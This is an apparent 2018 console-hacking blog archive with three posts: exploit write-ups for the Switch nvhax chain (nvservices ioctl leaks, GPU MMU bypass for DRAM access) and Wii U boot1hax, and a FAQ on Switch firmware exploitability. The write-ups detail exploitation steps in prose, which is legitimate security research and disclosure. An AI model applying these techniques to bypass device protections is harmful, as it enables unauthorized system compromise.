Hacking the planet...: 2018

Friday, December 28, 2018

The Switch - A Memoir

Welcome to a new write-up! Almost a year later after my last one on the Wii U...

Now, as we are getting close to the dawn of a new year, I will finally present one of the most fun exploit chains I ever had the privilege to discover and develop.
As you know, the Switch has seen many developments on the hacking front since its release and I'm proud to have taken part in a large number of them alongside SciresM, plutoo, derrek, naehrwert, yellows8, TuxSH, fincs, WinterMute and many others.
But before we reached the comfortable plateau we are in now, there were many complex attempts to defeat the Switch's security and today we will be looking into one of the earliest successful attempts to exploit the system from a bottom-up approach: the nvhax exploit.

To fully understand the context of this write-up we must go back to April 2017, a mere month after the Switch's international release.
Back then, everybody was trying to push the limits of the not-so-secret Internet Browser that came bundled with the Switch's OS. You may recall that this browser was vulnerable to a public and very popular bug known as CVE-2016-4657, notorious for being part of the Pegasus exploit chain. This allowed us to take over the browser's process with minimal effort in less than a week of the Switch's release.
The next logical step would be to escalate outside the browser's sandbox and attempt to exploit other, more privileged, parts of the system and this is how our story begins...

Introduction

Exploiting the browser became a very pleasant task after the release of PegaSwitch (https://github.com/reswitched/pegaswitch), a JS based toolkit that leverages vulnerabilities in the Switch's browser to achieve complex ROP chains.
Shortly after dumping the browser's binary from memory, documentation on the IPC system began to take form on the SwitchBrew wiki (https://switchbrew.org/wiki/Main_Page).
Before the generic IPC marshalling system now implemented in PegaSwitch, plenty of us began writing our own ways of talking with the Switch. One such example is in rop-rpc (https://github.com/xyzz/rop-rpc), another toolkit designed for running ROP chains on the Switch's browser.

I decided to write my own functions on top of the very first release of PegaSwitch as you can see below (please note that this is severely outdated):

Using this and the "bridge" system (PegaSwitch's way of calling arbitrary functions within the browser's memory space) I could now talk with other services accessible to the browser.
Since this was before smhax was discovered, I didn't know I could just bypass the restrictions imposed by the browser's NPDM so I focused exclusively on the services that the browser itself would normally use.
From these, nvservices immediately caught my attention due to the large amount of symbols left inside the browser's binary which, in turn, made black box analysis of the nvservices system module much easier. This also allowed me to document everything on the SwitchBrew wiki fairly quickly (see https://switchbrew.org/wiki/NV_services).

The nvservices system module provides a high level interface for the GPU (and a few other engines), abstracting away all the low level stuff that a regular application doesn't need to bother with. Its most important part is the nvdrv service family which, as the name implies, provide a communication channel for the NVIDIA drivers inside the nvservices system module.
You can easily see the parallelism with the L4T's (Linux for Tegra) source code but, for obvious reasons, in the Switch's OS the graphics drivers are isolated in a system module instead of being implemented in the kernel.

So, with a combination of reverse engineering and studying Tegra's source code I could steadily document the nvdrv command interface and, more importantly, how to reach the ioctl system that the driver revolves around. There are many ioctl commands for each device interface so this sounded like the perfect attack surface for exploiting nvservices.
Over several weeks I did nothing but fuzz as much ioctl commands as I could reach and, eventually, I found the bugs that would form the core of what would become the nvhax exploit.

The Bug(s)

The very first bug I found was in the /dev/nvmap device interface. This interface's purpose is to provide a way for creating and managing memory containers that serve as backing memory for many other parts of the GPU system.

From the browser's perspective, accessing this device interface consists in the following steps:

Open a service session with nvdrv:a (a variation of nvdrv, available only to applets such as the browser).
Call the IPC command Initialize which supplies memory allocated by the browser to the nvservices system module.
Call the IPC command Open on the /dev/nvmap interface.
Submit ioctl commands by using the IPC command Ioctl.
Close the interface with the IPC command Close.

Since we are hijacking the browser mid-execution, a service session with nvdrv:a is already created and the Initialize IPC command has already been invoked. After finding the service handle for this session we can simply send Open and Ioctl commands to any interface we like.
In this case, while messing around with the /dev/nvmap interface I found a bug in the NVMAP_IOC_FREE ioctl command that would leak back a memory pointer from the nvservices memory space:

I later found out that a few others had also stumbled upon this bug, so I stashed it away for a while.

A few days later I was messing around with the /dev/nvhost-ctrl-gpu interface and got a weird crash in one if its ioctl commands: NVGPU_GPU_IOCTL_WAIT_FOR_PAUSE.
Reverse engineering the browser's code revealed that this ioctl was indeed present, but no code path could be taken to call it under normal circumstances. Furthermore, I was able to observe that this particular ioctl command would only take a struct with a single u64 as its argument.
After finding it in the Tegra's source code (see https://github.com/arter97/android_kernel_nvidia_shieldtablet/blob/master/include/uapi/linux/nvgpu.h#L315) I was able to deduce that it was expecting a nvgpu_gpu_wait_pause_args struct which contains a single field: an u64 pwarpstate.
Turns out, pwarpstate is a pointer to a warpstate struct which contains 3 u64 fields: valid_warps, trapped_warps and paused_warps.

Without going into much detail on how the GM20B (Tegra X1's GPU) works:

The GM20B has 1 GPC (Graphics Processing Cluster).
Each GPC has 2 TPCs (Texture Processing Clusters or Thread Processing Clusters, depending on context).
Each TPC has 2 SMs (Streaming Multiprocessors) and each contains 8 processor cores.
Each SM can run up to 128 "warps".
A "warp" is a group of 32 parallel threads that runs inside a SM.

So, basically, this ioctl signals the GPC to pause and tries to return information on the "warps" running on each SM inside TPC0 (TPC1 is ignored).
You can find it in Tegra's source code here: https://github.com/arter97/android_kernel_nvidia_shieldtablet/blob/master/drivers/gpu/nvgpu/gk20a/ctrl_gk20a.c#L398

As you can see, it builds a warpstate struct with the information and calls copy_to_user using pwarpstate as the destination address.
Since dealing directly with memory pointers from other processes is incompatible with the Switch's OS design, most ioctl commands were modified to take "in-line" arguments instead. However, NVGPU_GPU_IOCTL_WAIT_FOR_PAUSE was somehow forgotten and kept the original memory pointer based approach.

What this means in practice is that we now have an ioctl command that is trying to copy data directly using a memory pointer provided by the browser! However, since any pointer we pass from the browser is only valid to the browser's memory space, we need to leak memory from the nvservices system module to turn this into something even remotely useful.
Upon realizing this, I recalled the other bug I had found and tried to pass the pointer it leaked to NVGPU_GPU_IOCTL_WAIT_FOR_PAUSE. As expected, I no longer had a crash, instead the command completed successfully!

Unfortunately, NVMAP_IOC_FREE leaks a pointer to a memory container allocated by nvservices using transfer memory. This means that, while the leaked address is valid in nvservices's memory space, it is impossible to find out where the actual system module's sections are located because transfer memory is also subjected to ASLR.

At this point, I decided to share the bug with plutoo and we began discussing potential ways to use it for further exploitation.

As I mentioned before, every time a session is initiated with the nvdrv service family, the client must call the IPC command Initialize and this command requires the client to allocate and submit a kind of memory container that the Switch calls Transfer Memory.
Transfer memory is allocated with the SVC 0x15 (svcCreateTransferMemory) which returns a handle that the client process can send over to other processes which in turn can use it to map that memory in their own memory space. When this is done, the memory range that backs up the transfer memory becomes inaccessible to the client process until the other process releases it.

A few days pass and plutoo has an idea: what if you destroy the service session with nvdrv:a and dump the memory range that backs the transfer memory sent over with the Initialize command?
And that's how the Transfer Memory leak or transfermeme bug was found. You can find a more detailed write-up on this bug from daeken, who also found the same bug independently, here: https://daeken.svbtle.com/nintendo-switch-nvservices-info-leak

With this new memory leak in hand I tried to blindly pass some pointers to NVGPU_GPU_IOCTL_WAIT_FOR_PAUSE and got mixed results (crashes, device interfaces not working anymore, etc.). But when I tried to pass the pointer leaked by NVMAP_IOC_FREE and dump the transfer memory afterwards, I could see that some data had changed.
As it turns out, the pointer leaked by NVMAP_IOC_FREE belongs to the transfer memory region and we can now use this to find out exactly what is being written by NVGPU_GPU_IOCTL_WAIT_FOR_PAUSE and where.
As expected, a total of 48 bytes were being written which, if you recall, make up the total space used by 2 warpstate structs (one for each SM). However, to my surprise, the contents had nothing to do with the "warps" and they kept changing on subsequent calls.
That's right, the warpstate structs were not initialized on the nvservices' side so now we have a 48 byte stack leak as well!
While this may sound convenient, it ended up being a massive pain in the ass due to how unstable the stack contents could be. But, of course, when there's a will there's a way...

The Exploit

Exploiting these bugs was very tricky...
The first idea I came up with was to try coping with the unreliable contents of the semi-arbitrary write from NVGPU_GPU_IOCTL_WAIT_FOR_PAUSE and just corrupt different objects that I could see inside the leaked transfer memory region. This had very limited results and led nowhere.
Luckily, by now, plutoo, derrek, naehrwert and yellows8 succeeded in exploiting the Switch using a top-down approach: the famous glitch attack than went on to be presented at 34C3. So, with the actual nvservices binary now in hand, we could finally plan a proper exploit chain.

Working with plutoo, we found out that other ioctl commands could change the stack contents semi-predictably and we came up with this:

As you can see, we use the NVGPU_GPU_IOCTL_WAIT_FOR_PAUSE bug as-is (due to the last byte being almost always 0) to overwrite the RMOS_SET_PRODUCTION_MODE flag. This allows the browser to access the debug only /dev/nvhost-dbg-gpu and /dev/nvhost-prof-gpu device interfaces and use previously inaccessible ioctl commands.
This was particularly useful to gain access to NVGPU_DBG_GPU_IOCTL_REG_OPS which could be used to plant a nice ROP chain inside the transfer memory. However, pivoting the stack still required some level of control over the stack contents for the NVGPU_GPU_IOCTL_WAIT_FOR_PAUSE bug to work.
Many other similar methods can be used as well, but this always ended up with the same issue: the NVGPU_GPU_IOCTL_WAIT_FOR_PAUSE bug was just too unreliable.

Some weeks pass and SciresM comes up with an insane yet brilliant way of exploiting this:

With a combination of mass memory allocations to manipulate the transfer memory's base address, some clever null byte writes and object overlaps we are now able to build very powerful read and write primitives using the transfer memory region and thus gain the ability to copy memory between the browser process and nvservices. Achieving ROP is now way easier and surprisingly stable with the exploit chain working practically 9 out of 10 times.
By now, smhax had already been discovered hence why nvdrv:t is being used in the code instead. However, this was purely experimental (to understand the different services' access levels) and is not a requirement. The exploit chain works without taking advantage of smhax or any other already patched bugs.

We finally escaped the browser and have full control over nvservices so, what should we do next? What about take the entire system down? ;)

The Aftermath

You may recall from gspwn (see https://www.3dbrew.org/wiki/3DS_System_Flaws#Standalone_Sysmodules) on the 3DS that GPUs are often a great place to look into when exploiting a system. Having this in mind since the beginning motivated me to attack nvservices in the first place and, fortunately, the Switch was no exception when it comes to properly secure a GPU.
After SciresM's incredible work on maturing ROP for nvservices, I began looking into what could be done with the GM20B inside the Switch. A large amount of research took place over the following weeks, combining the publicly available Tegra's source code and TRM with the envytools/nouveau project's code and my own reverse engineering of the nvservices system module. It was at this time that this incredibly enlightening quote from the Tegra X1's TRM was found:

If you watched the 34C3 Switch Security talk you probably remember this. If not, then I highly recommend at least re-reading the slides over here: https://switchbrew.github.io/34c3-slides/

I/O devices inside the Tegra X1's SoC are subjected to what ARM calls the SMMU (System Memory Management Unit). The SMMU is simply a memory management unit that stands between a DMA capable input/output bus and the main memory chip. In the Tegra X1's and, consequentially, the Switch's case, it is the SMMU that is responsible for translating accesses from the APB (Advanced Peripheral Bus) to the DRAM chips. By properly configuring the MC (Memory Controller) and locking out the SMMU's page table behind the kernel, this effectively prevents any peripheral device to access more memory than it should.
Side note: on firmware version 1.0.0 it was actually possible to access the MC's MMIO region and thus completely disable the SMMU. This attack was dubbed mchammer and was presented at the 34C3 Switch Security by plutoo, derrek and naehrwert.

So, we now know that the GPU has its own MMU (accordingly named GMMU) and that it is capable of bypassing entirely the SMMU. How do we even access it?
There are many different ways to achieve this but, at the time and using the limited documentation available for the Maxwell GPU family, this is what I came up with:

Scan nvservices' memory space using svcQueryMemory and find all memory blocks with the attribute IsDeviceMapped set. Odds are that this block is mapped to an I/O device and thus the GPU.

Locate the 0xFACE magic inside these blocks. This magic word is used as a signature for GPU channels so, if we find it, we found a GPU channel structure.

Find the GPU channel's page table. Each GPU channel contains a page directory that we can traverse to locate and replace page table entries. Remember that these entries are used by the GMMU and not the SMMU which means not only they follow a different format but also that the addresses used by the GMMU represent virtual GPU memory addresses.

Patch GPU channel's page table entries with any memory address we want. The important part here is setting bit 31 in each page table entry as this tells the GMMU to access physical memory directly instead of going through the SMMU as usual.

Get the GPU to access our target memory address via GMMU. I decided to use a rather obscure engine inside the GPU that envytools/nouveau calls the PEEPHOLE (see https://envytools.readthedocs.io/en/latest/hw/memory/peephole.html). This engine can be programmed by poking some GPU MMIO registers and provides a small, single word, window to read/write virtual memory covered by a particular GPU channel. Since we control the channel's page table and we've set bit 31 on each entry, any read or write going through the PEEPHOLE engine will access any DRAM address we want!

After all this, we now have a way to dump the entire DRAM... well, sort of.
An additional layer of protection is enforced at the MC level and that is the memory carveouts. These are physical memory ranges that can be completely isolated from direct memory access.

Since I first implemented all this in firmware version 2.0.0, dumping the entire DRAM only gave me every non-built-in system module and applet that was loaded into memory. However, SciresM later tried it on 1.0.0 and realized we could dump the built-in system modules there!
Turns out, while the kernel has always been protected by a generalized memory carveout, the built-in system modules were loaded outside of this carveout in firmware 1.0.0.
Additionally, the kernel itself would start allocating memory outside of the carveout region if necessary. So, by exhausting some kernel resource (such as service handles) up to the point where kernel objects would start showing up outside of the carveout region, SciresM was able to corrupt an object and take over the kernel as well.
From that point on, we could use jamais vu (see https://www.reddit.com/r/SwitchHacks/comments/7rq0cu/jamais_vu_a_100_trustzone_code_execution_exploit/) to defeat the Secure Monitor and later use warmboothax to defeat the entire boot chain. But, that wasn't the end...

I wanted to reach the built-in system modules on recent firmware versions as well, so SciresM and I cooked up a plan:

Use smhax to load the creport system module in waiting state.
Use gmmuhax to find and patch creport directly in DRAM.
Launch a patched creport system module that would call svcDebugActiveProcess, svcGetDebugEvent and svcReadDebugProcessMemory with arguments controlled by us.
Use the debug SVCs to dump all running built-in system modules.

This worked for getting all built-in system modules (except boot, which only runs once and ends up overwritten in DRAM)! Naturally, we didn't know about nspwn back then so all this was moot.
However, firmware version 5.0.0 fixed nspwn and suddenly all this was relevant again. We had to work around the fact that smhax was no longer available which required some very convoluted tricks using DRAM access to hijack other system modules.
To make matters worse, Switch units with new fuse patches for the well known RCM exploit were being shipped so the need for nvhax was now very real.

The Fixes

While the GMMU attack itself cannot be fixed (since it's an hardware flaw), some mitigations have been implemented such as creating a separate memory pool for nvservices.

As for nvhax, all 3 bugs mentioned in this write-up have now been fixed in firmware versions 6.0.0 (Transfer Memory leak) and 6.2.0 (NVGPU_GPU_IOCTL_WAIT_FOR_PAUSE and NVMAP_IOC_FREE bugs).

The fix for the Transfer Memory leak consists on simply tracking the address and size of the transfer memory region inside nvservices and every time a service handle is closed, the entire region is cleared before becoming available to the client again.

The NVGPU_GPU_IOCTL_WAIT_FOR_PAUSE bug was fixed by changing its implementation to match every other ioctl command: have the command take "in-line" parameters instead of a memory pointer. The command now returns the 2 warpstate structs directly which are now also properly initialized.

As for the NVMAP_IOC_FREE bug, it now takes into account the case where the client doesn't supply its own memory and prevents the nvservices' transfer memory pointer to be leaked back.

Conclusion

This was definitely one of the most fun exploits I ever worked on, but the absolute best part was having the opportunity to develop it alongside such talented individuals like plutoo, SciresM and many others.
Working on this was a blast and knowing how long it managed to remain unpatched was surprisingly amusing.

As promised, an updated version of this exploit chain written for firmware versions 4.1.0, 5.x and 6.0.0 will be progressively merged into the PegaSwitch project.

As usual, have fun!

Sunday, January 14, 2018

Anatomy of a Wii U: The End...?

Welcome to a new write-up! Last time I wrote one of these was months ago, but I had good reasons for that (*cough*Switch*cough*).

Since as early as March, I've been working non-stop on hacking and reverse engineering the Switch alongside extremely talented hackers/developers such as plutoo, derrek, yellows8 and SciresM.
Together we have achieved incredible milestones and I'm really glad all our hard work eventually paid off.

That said, let's move on to the reason for this post: the Wii U.
If you are one of those few ~~weirdos~~ enthusiasts that still care about this console, you might recall last year's CCC where derrek, naehrwert and nedwill showcased their progress in hacking the last bits of the 3DS and Wii U.
Back then, they demonstrated their own exploitation path for taking down both the PPC and ARM processors on the Wii U, which was something that had already been publicly achieved using different bugs/exploits. This was also achieved much earlier by the hacking group fail0verflow which showcased their findings during the 30th edition of the CCC (back in 2013).

It was a very cool talk all around, but the main highlight for Wii U hacking fans was something derrek brought up: boot1.
This particular piece of the Wii U's boot chain was never obtained up until derrek and his team (plutoo, yellows8, smealum and naehrwert) successfully launched an hardware based attack that resulted in dumping the boot1 key.
The setup for this attack remained private, but the overall exploitation process was explained during the talk and is also documented here: http://wiiubrew.org/wiki/Wii_U_System_Flaws#boot0

That was the last nail in the Wii U's coffin... or was it? Naturally, after obtaining the boot1 binary, derrek and his team began looking for vulnerabilities in it. While most of the usually critical stuff (signature handling, file parsing, etc.) was found to be safely implemented, derrek, plutoo, yellows8, naehrwert and shuffle2 did find one potential bug. However, due to lack of motivation and time, it remained just a theory.

I even wrote a blog post about all this where I mistakenly assumed some things that weren't true. Then I issued another blog post apologizing for said assumptions... Those were confusing times. :P
However, that's what got me to chat with derrek and get to know him better.

After some discussions about boot1, derrek agreed on sharing with me the potential bug that was mentioned during CCC. His team was already getting ready for the Switch release and they had little to no time left to work on trying to exploit this bug, so I offered my help.

A few days later I found a way to exploit this bug and achieved boot1 code execution! Neat, huh?
So, without further ado, I present you a writeup on the mythical boot1hax. :D

NOTE: Obtaining the boot1 binary in the first place is out of scope for the purposes of this writeup.

The Bug

The bug itself is really simple.
After some hours reverse engineering the boot1 binary and using the information derrek had shared with me, finding the bug was straightforward.
However, to understand it, we have to look into a specific IOSU process: IOS-MCP.

Wait, IOS-MCP? That loads AFTER boot1, what could possibly relate them?
Turns out, IOS-MCP manages something that plenty of people have already looked into (and maybe even guessed it's purpose), but couldn't exactly undestand what it does.

There is a range of physical memory mapped in IOSU that appears to serve no clear purpose: 0x10000000 to 0x100FFFFF (see http://wiiubrew.org/wiki/Physical_Memory).

The typical layout of this region is as follows:
Breaking it down, we have a pattern filling the first 0x400 bytes followed by NULL bytes up until this PRSH/PRST structure:
This structure is created by IOS-MCP to keep track of the addresses and sizes of several memory regions. It is encapsulated with a header (PRSH) and a footer (PRST) and contains an array of structures describing memory regions.
In the latest firmware version, only 7 regions are registered in this structure. Here's an example parsed from my console:
While most of these regions contain nothing particularly interesting, there is one exception: boot_info.
This region stores data passed along from boot0 and boot1 to IOS-MCP! An example from my console:
As an example, the last 8 fields contain the time spent on each boot0/boot1 stage and this data is printed on crash logs.

What derrek and his team found out by looking at the boot1 binary is that this structure is also passed back to boot1!
How? Well, right before a reset is asserted, IOS-MCP encrypts the entire 0x10000400 to 0x10008000 range with the Starbuck ancast key. When the console reboots, RAM contents are not cleared and boot1 will decrypt this range and parse the PRSH/PRST struct looking for the boot_info region.

Even though this might look like a weird way to pass data back and forth across the boot chain, this process is actually properly implemented and boot1's code for parsing the PRSH/PRST structure is sound. But there is one exception...

On coldboot, where the RAM contents are cleared, it's boot1 that creates boot_info for the fist time at the hardcoded address 0x10008000 and inserts this information into the PRSH/PRST structure. However, on a warmboot, boot1 decrypts and parses the already existing PRSH/PRST structure in RAM which might have been changed by IOS-MCP. This means that boot1 actually locates the boot_info section inside the PRSH/PRST structure and uses the pointer stored there to read/write the actual data.

This shouldn't be a problem, but they forgot to validate the pointer to boot_info data, which means that if IOS-MCP changes it, boot1 will attempt to read/write the boot_info data from any address we want (instead of 0x10008000)!

What derrek and his team were able to verify is that changing the pointer for boot_info to an address within boot1's stack region would crash boot1. A plausible exploitation path here would be to take advantage of whatever boot1 writes into boot_info to overwrite some LR address stored in boot1's stack and gain code execution.
Unfortunately, this is very impractical. Turns out, the way boot_info is parsed and modified by boot1 is very, very restricted.

The Exploit

So, we have this weird small structure that boot1 uses to communicate with IOSU (and vice versa) and we can control the pointer for said structure to force boot1 to read it from anywhere we want. The only way to tell if this can be exploited or not is to know exactly why this boot_info structure exists and how boot1 handles it, so I'm going to cheat and jump straight to a breakdown of how it's done:
As you can see, there's not much going on. The PRSH/PRST structure is decrypted from RAM and boot1 tries to locate boot_info inside it. If it fails, a new boot_info entry is created and inserted into the PRSH/PRST structure, but the pointer for it's data will be hardcoded to 0x10008000, thus causing any subsequent reads/writes to occur in a perfectly safe address range. However, if it does find a preexisting boot_info entry, boot1 will fetch it's data from the pointer stored inside the PRSH/PRST structure and this is what we are interested in causing.

The attack plan is simple:

Use any exploit we want and escalate to IOS-MCP (or even better, to the IOSU's kernel);

Craft/modify the PRSH/PRST structure in memory using a modified boot_info pointer;

Encrypt the PRSH/PRST structure with the Starbuck ancast key and boot_info IV (stored at 0x050677C0 in IOS-MCP);

Force a reboot.

As expected, we can force boot1 to take a modified boot_info pointer and start reading the data from anywhere we want. Now comes the real challenge: where should we point to?

We must focus on the boot_info fields that are always modified by boot1, but we also need to take into account how boot1 tells if boot_info already exists or not. This happens in sub_D40AF10 and it goes like this:

Each PRSH/PRST section is parsed and it's name is compared against the string "boot_info";

If the boot_info section is found, it's size is checked and it must be 0x58;

Finally, the boot_info_04 field must have bit 0x80 (big endian) set.

This last check is very important since boot1 only accepts a preexisting boot_info structure if the word at offset 0x04 has that specific bit set.

It's now clear that we can achieve a semi-arbitrary write in boot1 by abusing this particular bug. All we need is to change the boot_info pointer inside our crafted PRSH/PRST into something that resembles a valid boot_info structure from boot1's point of view. This would then result in boot1 updating those boot_info fields listed before and, therefore, write data to an arbitrary address.

Let's leave the "boot_info_04 field must have bit 0x80 set" aside for a while and focus on which fields might be useful to write into boot1's address space:

boot_info_08: this is only modified by boot1 when a specific RTC event has occurred.

boot_info_38 to boot_info_54: these are used to store the time spent on the various boot0/boot1 stages.

boot_info_0C: this is increased by 1 each time a warmboot occurs (gets set back to 0 on a coldboot).

To be more precise, there are indeed a few more fields that are modified by boot1, but these are always set to either 0 or -1 in a way that doesn't make it really practical to choose them.

I began by focusing on the time related fields, but these just turned out to be too volatile for a reliable memory corruption. Also, boot_info_0C is not really useful either since it keeps changing on each warmboot.
What about boot_info_08? For this field to be read/written the RTC must have the SLEEP_EN flag set. Luckily, we can just force this flag to be set by calling the system call ios_shutdown(1) (see http://wiiubrew.org/wiki/Syscalls) which also happens to trigger a system reset!

Still, boot_info_08 will be overwritten with rtc_events |= (boot_info_08 & 0x101E). From blind tests, I could tell the final value that got written was always 0x0020XXXX, which means I could write a NULL byte followed by 0x20 and whatever was in the lower bits of boot_info_08. This is far from optimal... :\

Took me about 2 afternoons of reading boot1's binary until I finally found the perfect place to corrupt:

This particular snippet is the epilogue of sub_D40AC30, which runs immediately after boot_info_08 is modified. Doesn't look particularly interesting, but let's check the hex:
Jackpot! Since we are running way before MMU is set up and all that, we can do unaligned memory reads/writes just fine, so, if I change the boot_info pointer to 0x0D40AC6D, boot1 will see the following structure:

boot_info_00: 0x00BC0E46

boot_info_04: 0x93469D47

boot_info_08: 0x080000XX

Since boot_info_04 has bit 0x80 (big endian) set, boot1 will overwrite boot_info_08 with 0x0020XXXX. Why is this important? Because we now have mutated the instruction BX R1 into BX R0 and R0 is 0.
This means boot1's execution will fall into NULL. Normally this isn't very exciting, but in the Wii U's case the physical address range 0x00000000 to 0x01FFFFFF maps to MEM1 (which is frequently used for graphics).

This memory range is not cleared on a warmboot either so, as long as boot0 and boot1 leave it alone, we can actually plant our payload there and have arbitrary code execution going!

It's known that boot0 doesn't touch any relevant RAM regions, but what about boot1? Well, boot1 actually accesses the three RAM regions (MEM0, MEM1 and MEM2):

MEM0 is fully cleared by boot1 as soon as it starts;

MEM2 is left untouched, with the exception of the first 0x400 bytes at address 0x10000000 which are filled with a binary pattern for testing RAM self-refresh;

MEM1 is also left untouched, with the exception of a single word (0x20008000) being written at address 0x0000000C for unknown reasons.

As long as our payload starts right away with a jump over address 0x0000000C, we are good!

So, I cook up a small payload to copy boot1 from SRAM into some unused MEM2 region, patch the corruption I just caused, jump back to where execution fell to NULL and let boot1 finish. Now I just need to escalate into IOS-MCP or IOSU's kernel and fish out the binary!

As a bonus, this particular method allows me to hijack execution before the 2 mysterious OTP blocks get locked (see http://wiiubrew.org/wiki/Hardware/OTP) so I can easily piggyback on boot1's OTP reading functions and get them too!
Sadly, these blocks are never used and were likely locked out as a preemptive measure so a future update could begin to use them instead of some other key material (especially since the 2 blocks are not per-console).

And there you have it, boot1 code execution from a RAM based attack!
Along with this writeup, I'll be publicly documenting boot1 over at http://wiiubrew.org and I'm releasing a patch for my long forgotten project hexFW that gives you the option to dump your console's boot1 and unlocked OTP: https://github.com/hexkyz/hexFW/commit/f52f85f683dfcef0544f8ddb3643cef5cfa2ee86

NOTE: This does not include the boot1 AES key, since that one is long gone by the time we are running code in boot1!

What about CFW? Well this attack on it's own doesn't really help you there.
In order to get a custom firmware running straight from boot1 another kind of attack is preferred, specially something that actually survives a coldboot. :\
Remember that this only works due to RAM not being cleared on a warmboot so it's impossible to achieve persistence this way.

However... There's one plausible vector that could be used to create a much safer alternative to current methods.
Leveraging this bug from the vWii environment, for example, could grant a nice boot(ish) time CFW by combining some form of contenthax in a way that entering vWii mode would launch the boot1hax payload, reset the console and send you right into a CFW. The total time spent on this would be minimal and it would create a dual-boot environment where you could hold down the "B" button on boot to jump into CFW or do nothing to land on the vanilla OS. That is, of course, if you wouldn't mind sacrificing your vWii channel for a while (it would then be possible to restore it from within the CFW environment, so that's not really an issue).

I've been looking into this for quite some time with derrek, but the Switch has been taking most of our time so I kept postponing this project endlessly. Regardless, I still plan on picking this up one last time during the start of this new year, but derrek and I agreed on sharing this anyway so others can also get the chance to research boot1 and hopefully find some new bugs in the process.

All this has been kept under wraps for quite a while for a very good reason: it's insanely easy to patch. Now that the Wii U reached it's EoL and the Switch is the new kid on the block, it seems appropriate to end (for good) the Wii U cycle while homebrew on the Switch is just beginning to flourish.

Retail plaintext boot1 (v8377) SHA-256: 5013BFABC578CBA08843D9A0F650171942A696CBC54DF12E754D9E0978FCD3B1

I hope you enjoyed reading this as much as I did writing it. :)
Stay safe and have fun!

Saturday, January 13, 2018

The Switch - State of Affairs

Let's kick off the new year with a new blog post!

Since this last year's CCC talk where derrek, naehrwert and plutoo showcased their progress on hacking the Switch, tons of misinformation began floating around about which firmware is necessary for homebrew.
I believe it's now time to put up a nice and comprehensive FAQ on all things Switch hacking related.
So, buckle up, and if you have the questions, here are the answers.

Q: Who the hell are you and why should I take your answers seriously?
A: I've been working on hacking the Switch since day 1. I've found bugs and developed exploits on my own at first and eventually ended up integrating a small loose crew of hackers that share the same interests. While we work together on a certain level, we also work either individually or among other groups (Switchbrew, ReSwitched, etc.).

Q: Were you involved in 34c3?
A: Not directly. Just like many others who were credited during the talk, I've worked with derrek, naehrwert and plutoo on hacking the Switch, but what was presented during the talk is a reflection of these hackers separate work.

Q: I have been told for quite a while that firmware 3.0.0 is where I should be at. They even said so during the talk! What does that mean?
A: Firmware 3.0.0 introduced a specific bug that allowed for userland code execution, but the same bug was patched immediately after on the next firmware update. This created the perfect starting point for publicly disclosing this vulnerability and laying down the foundations of homebrew.
The idea was simple: get as many people as possible on firmware 3.0.0 so everybody can start working on writing homebrew right away. What wasn't particularly clear is that this is ultimately an advice for homebrew developers and not the average end user.

Q: And what about [insert firmware version here]?
A: Here's something that you probably don't know yet: ALL current firmware versions are exploitable up to the point of running your own code.
Yes, you read that right. This includes firmware 1.0.0 all the way up to 4.1.0.

Q: So, can I just update my Switch?
A: Yes and no. This is a question many have been asking and conflicting answers are causing a great deal of confusion among people.
The basic principle is the following: if you have no reason to upgrade from your current firmware version (regardless of what it is), then simply don't upgrade.

However, the real answer is quite more nuanced. Increasing firmware versions obviously include additional patches for a myriad of vulnerabilities, therefore, the lowest firmware version (1.0.0) is the most vulnerable. Obviously, for a number of reasons, not everybody will be able to get their hands on a launch day system, so there's always interest in exploiting new updates.

In an effort to clear the air and promote a less toxic environment, here comes the current state of affairs regarding Switch hacks:
- Firmware 1.0.0:
-> Contains critical system flaws that allow code execution up to the TrustZone level;
-> Most of what was showcased during 34c3 originally targeted this firmware version;
-> Allows for a full blown emuNAND/CFW setup.

- Firmware 2.0.0-2.3.0:
-> Contains system flaws that allow code execution up to the kernel level;
-> Can be exploited to run homebrew using private methods (e.g.: nvhax).

- Firmware 3.0.0:
-> Contains system flaws that allow code execution on the userland level;
-> Can be exploited to run homebrew using private methods (e.g.: nvhax);
-> Can be exploited to run homebrew using public methods (e.g.: rohan).

- Firmware 3.0.1-4.1.0:
-> Contains system flaws that allow code execution on the userland level;
-> Can be exploited to run homebrew using private methods (e.g.: nvhax).

As you can see, the higher the firmware version, the less options you have. However, code execution for homebrew is still assured across all firmware versions.

Q: Wait, did I read that right? Firmware 2.0.0 to 2.3.0 can be exploited up to the kernel?
A: Yes, but no additional information will be disclosed at this point.

Q: What is that nvhax thing?
A: This is currently a private method that I originally discovered and exploited. Joined by SciresM and plutoo, we have successfully used it to exploit pretty much all firmware versions to the point where running homebrew is possible.

Q: Will nvhax be released? When?
A: Yes, but there are no plans to release it any time soon. Having code execution on the latest firmware version available is a privilege that ought to be maintained for as long as possible.
That said, when it stops being useful it will be released as an alternative for people on firmware versions above 3.0.0 to enjoy homebrew.

Q: Ok, so, I'm a developer with a strong passion for homebrew and would love to start right away. What do you suggest?
A: Update your Switch to firmware version 3.0.0, read about rohan and get to work!

Q: Now, I'm just a regular user that loves homebrew, but has no intent or knowledge to develop my own. I also want to play the latest games on my Switch and don't really mind waiting. What do you suggest?
A: Update to the latest firmware version and wait.

Q: What if I'm an avid hacker/developer who wants to explore the system as much as possible?
A: Find a 1.0.0 unit and stay there.

Q: And what if I just want to pirate games?
A: You're barking at the wrong tree.

Hopefully this FAQ will put to rest some of the doubts people have been expressing lately and help them understand the necessary steps to enjoy homebrew on their consoles.
More information will be shared when the time is right, but rest assured we are all working hard on really cool stuff and, hopefully, helping to build a strong homebrew community for the Switch.

Also, stay tuned for a very special blog post in the following days. ;)

As always, have fun!